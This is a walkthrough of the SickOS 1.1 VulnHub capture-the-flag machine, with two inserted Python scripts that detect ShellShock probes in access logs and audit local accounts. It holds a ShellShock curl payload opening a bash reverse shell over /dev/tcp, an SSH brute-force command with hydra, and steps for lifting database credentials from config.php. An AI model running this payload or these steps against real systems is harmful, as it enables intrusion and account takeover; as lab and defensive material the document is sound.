Sickos 1.1 Walkthrough

This is a walkthrough of SickOS 1.1 found on VulnHub. The objective is to compromise the VM, gain root privileges, and find the flag. We need to treat this machine as a remote server, so we can’t use any kernel tricks here.

After booting the virtual machine, I needed to find the IP address of the box, so I did a simple ping sweep.

nmap -n -sP

SickOS 1.1 Ping Sweep

The IP address of the SickOS 1.1 server is I knew this because the Kali VM IP address is Now that I have the IP of the SickOS server I need to identify any open ports. Running an nmap scan of the host will give me the information I need to get started:

nmap -n -Pn -sS -p -

SickOS 1.1 Nmap Scan

The results show what looks like a Squid proxy server open on port 3128 and SSH on port 22. Next I want to run a Nikto scan to look for any low-hanging fruit. Be sure to use the “-useproxy” flag so the scan runs through the proxy.

nikto -h -useproxy

SickOS 1.1 Nikto Scan

Some interesting results come back from the Nikto scan. Here we can see that the “/cgi-bin/status” portion of the site is vulnerable to ShellShock. We will use this as an attack vector to exploit the server and gain access to the box. Open a second terminal window and establish a netcat listener.

nc -lvnp 666

Now we exploit ShellShock using curl.

curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ 0>&1" -x

SickOS 1.1 ShellShock Exploit

After running the curl command, switch over to the terminal window that is running our Netcat listener. You should have been given a shell prompt.
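The server-side view of the request described above, as an added example that is not part of the original walkthrough: Apache (or any CGI host) exports request headers into the environment of the CGI script, which is why a header value that begins with a bash function definition reaches the vulnerable bash. The script below parses Apache combined-format access log lines (constructed here, not taken from the SickOS box) and flags any request whose User-Agent or Referer carries that function-definition prefix, the signature of a ShellShock probe. The field names and sample values are assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed Apache "combined" log lines (not from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /usr/bin/id"
10.0.0.7 - - [10/Oct/2020:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.5 - - [10/Oct/2020:13:57:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored; }; echo vulnerable" "curl/7.68.0"
10.0.0.9 - - [10/Oct/2020:13:58:40 +0000] "GET /wolfcms/ HTTP/1.1" 200 4096 "-" "Nikto"
"""

# Apache combined format: ip ident user [ts] "method path proto" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Vulnerable bash treats an environment value starting with "() {" as a function
# definition and keeps parsing past the closing brace. Whitespace varies between
# probes, so the match is deliberately loose.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Header-derived fields that the combined log format preserves. Any header is
# exported to CGI, so a full detection would inspect every header the server logs.
HEADER_FIELDS = ("ua", "referer")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text: str) -> List[dict]:
    """Scan log text and return one finding per header field carrying a ShellShock prefix."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in HEADER_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "line": lineno,
                    "ip": rec["ip"],
                    "path": rec["path"],   # a /cgi-bin/ target makes the finding more credible
                    "field": field,
                    "value": rec[field],
                })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} -> {hit['path']} via {hit['field']}: {hit['value']!r}")
```

Run against a real access log, the same function works on file contents read with `open().read()`; a probe that uses a header the log format does not record (for example Cookie) would only be visible with a custom LogFormat or in a request-inspecting proxy such as the Squid instance on this box.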

SickOS 1.1 Reverse Shell Prompt

Now that we have access on the box we need to gather some information. First I am going to check out the “/etc/passwd” file.

cat /etc/passwd

SickOS 1.1 /etc/passwd

In the results we see that an account exists with the username “sickos”, that it has a home directory under “/home”, and that the user has shell access on the box. Now I want to check out the “/etc/group” file for more information.

cat /etc/group

SickOS 1.1 /etc/group

The results show that the user “sickos” is part of the “adm” group. This is indicative of the user being able to use the sudo command to access root. Armed with this info I am going to attempt to brute-force SSH to see if I can get the password. I figure I will let hydra run while I poke around the box looking for any further useful information.
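The two enumeration steps above (reading “/etc/passwd” and “/etc/group”) joined into one account audit, as an added example that is not part of the original walkthrough. The script parses both files in their standard colon-separated formats, resolves each user's group membership (primary GID plus supplementary entries), and reports accounts that either have an interactive shell or belong to a privileged group. The file contents here are constructed, not the SickOS box's real files, and the privileged-group list is an assumption.

```python
from typing import Dict, List

# Constructed sample files (not from the original page).
PASSWD_TEXT = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
"""

GROUP_TEXT = """\
root:x:0:
adm:x:4:sickos
sudo:x:27:backup
www-data:x:33:
backup:x:34:
sickos:x:1000:
mysql:x:103:
"""

# Shells that deny interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# Assumed set of groups worth flagging: "adm" (log access) as the walkthrough keys on,
# plus the groups Debian/Ubuntu and RHEL-style sudoers files commonly grant root through.
PRIVILEGED_GROUPS = {"root", "adm", "sudo", "admin", "wheel"}


def parse_passwd(text: str) -> Dict[str, dict]:
    """Map user name -> uid/gid/home/shell from /etc/passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_group(text: str) -> Dict[str, dict]:
    """Map group name -> gid and supplementary members from /etc/group-format text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": set(filter(None, members.split(",")))}
    return groups


def groups_of(user: str, users: Dict[str, dict], groups: Dict[str, dict]) -> List[str]:
    """All groups a user belongs to: the primary GID from passwd plus supplementary entries."""
    primary_gid = users[user]["gid"]
    return sorted(
        name for name, info in groups.items()
        if info["gid"] == primary_gid or user in info["members"]
    )


def audit(passwd_text: str, group_text: str) -> List[dict]:
    """Report accounts with an interactive shell or membership in a privileged group."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    report = []
    for name, info in users.items():
        member_of = groups_of(name, users, groups)
        privileged = sorted(set(member_of) & PRIVILEGED_GROUPS)
        interactive = info["shell"] not in NOLOGIN_SHELLS
        if interactive or privileged:
            report.append({
                "user": name,
                "uid": info["uid"],
                "interactive_shell": interactive,
                "privileged_groups": privileged,
                "groups": member_of,
            })
    return report


if __name__ == "__main__":
    for entry in audit(PASSWD_TEXT, GROUP_TEXT):
        print(entry)
```

On a live system the same functions take the contents of the real files; note that group membership alone does not prove sudo rights, which are decided by /etc/sudoers and /etc/sudoers.d, so the report is a list of accounts to check with `sudo -l` rather than a verdict.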

hydra -t 10 -l sickos -P /usr/share/wordlists/rockyou.txt -vV ssh

I tried to get this started several times to no avail. It looks like there might be something blocking it, so I am going to continue gathering information on the box. Because this server is acting as a web server, and web files are typically hosted in “/var/www”, I am going to change to that directory and list all of its files.

cd /var/www/
ls -la

SickOS 1.1 ls /var/www

Here we see a directory called “wolfcms”, which contains the website and its configuration files. Within the “wolfcms” directory there is a file called “config.php”. These config files typically hold database usernames, passwords, and configuration settings for the website, so I am going to take a look.

cat wolfcms/config.php | head -20

SickOS 1.1 config.php Contents

In “config.php” there is a database username and password. One thing about users is that they tend to reuse the same password everywhere, so let’s try it with SSH and the “sickos” user.

ssh sickos@

The SSH username and password worked! Since we know “sickos” is in sudoers, let’s switch to “root” and see what is in the “/root” directory.

sudo su -
# enter sickos password

Inside the “/root” directory is the flag; cat the file out and we have completed the objective!

SickOS 1.1 Cat Flag